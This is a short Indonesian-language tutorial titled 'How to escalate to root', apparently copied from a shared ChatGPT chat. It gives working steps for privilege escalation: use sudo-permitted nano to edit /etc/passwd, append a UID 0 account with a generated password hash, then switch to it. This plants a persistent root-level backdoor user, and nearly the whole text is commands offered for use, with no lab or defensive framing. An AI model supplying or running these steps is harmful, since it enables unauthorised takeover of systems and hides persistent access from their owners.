


Cara Eskalasi ke Root

 chatgpt.com/share/e2079c90-1462-45c8-bb3b-7ee906b6dcbe

1. Buka file **/etc/passwd** dengan nano:

Jalankan perintah berikut:

```
sudo /bin/nano /etc/passwd
```

2. Tambahkan user baru dengan hak akses root:

Tambahkan baris baru di bagian akhir file tersebut dengan format sebagai berikut:

```
username:password_hash:0:0:root:/root:/bin/bash
```

Di mana:

- **username** adalah nama user yang ingin Anda buat.
- **password_hash** adalah hash password untuk user baru tersebut.

Anda bisa membuat password hash baru menggunakan perintah berikut:

```
openssl passwd -1
```

Misalnya, jika Anda ingin membuat user bernama **newuser** dan hash password yang dihasilkan adalah **\$1\$abc123\$wHjTtK0VjG7Tz4M3j5zZQ/**, baris yang perlu Anda tambahkan akan terlihat seperti ini:

```
newuser:$1$abc123$wHjTtK0VjG7Tz4M3j5zZQ/:0:0:root:/root:/bin/bash
```

3. Simpan perubahan:

Tekan **CTRL + O** untuk menyimpan, lalu tekan **Enter**. Setelah itu, keluar dari nano dengan menekan **CTRL + X**.

4. Login dengan user baru:

Setelah perubahan disimpan, Anda bisa login dengan user baru:

```
su - newuser
```

User baru ini akan memiliki hak akses root karena UID (0) dan GID (0) yang telah Anda set di `/etc/passwd`.